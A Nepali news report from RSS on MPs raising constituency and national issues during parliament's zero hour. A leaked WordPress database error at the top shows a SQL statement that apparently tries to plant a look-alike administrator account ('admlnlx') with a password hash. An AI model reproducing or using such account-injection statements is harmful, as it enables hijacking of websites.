WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk5N42QIJSOiQsYkFfRYiLzji6ytzI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:02:35', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १४ –
व्यवस्थापिका– संसद्को आजको बैठकको शून्य समयमा सांसदहरुले समसामयिक विषयमा सरकारको ध्यानाकर्षण गराउनुभएको छ ।
सांसद दुलारी हरिजनले पूर्व –पश्चिम राजमार्गको नवलपरासी खण्डमा रहेका पुल जीर्ण भएकोप्रति सरकारको ध्यानाकर्षण गराउँदै मुलुकभरका अस्पतालका चिकित्सक र अन्य कर्मचारीको बोली व्यवहार मिठो हुनुपर्ने धारणा राख्नुभयो ।
सांसद धनबहादुर रायमाझीले भूकम्पपीडित जनतालाई प्रतिबद्धता गरेअनुसारको राहत हालसम्म उपलब्ध गराउन नसकेको भन्दै सरकारको ध्यानाकर्षण गराउनुभयो ।
सांसद नरबहादुर थापामगरले गत साउनमा बागलुङमा बाढीपहिरोबाट ठूलो जनधनको क्षति भएको जानकारी सरकारलाई भए पनि हालसम्म प्रभावकारी रुपमा राहतका कुनै काम नभएको गुनासो गर्नुभयो ।
सांसद पुरुषोत्तम पौडेलले मुलुकको सीमामा भएको हस्तक्षेप र जनताले दुःख पाएको समाचार दिनहँु आए पनि सरकार मौन रहेको टिप्पणी गर्नुभयो ।
सांसद पाँचकर्ण राईले खोटाङमा स्थानीय तह पुनःसंरचना सम्बन्धमा सर्वसम्मतिले पठाएको निर्णयलाई आयोगले गाउँपालिकालाई छिन्नभिन्न हुने गरी प्रतिवेदन गरेकोमा आपत्ति जनाउँदै यसप्रति सरकारको ध्यानाकर्षण गराउनुभयो ।
सांसद प्रतिक्षा तिवारीले भूकम्प गएको लामो समय बितेपनि विशेष रुपमा महिला वर्ग अझै असुरक्षित भएर बस्न बाध्य हुनुपरेकोप्रति सरकारको ध्यानाकर्षण गराउनुभयो ।
सांसद प्रेमबहादुर आले डोटीमा रहेका विमानस्थल निर्माण र सञ्चालनमा सरकारले तदारुकताका साथ काम गर्नुपर्ने धारणा राख्नुभयो । – रासस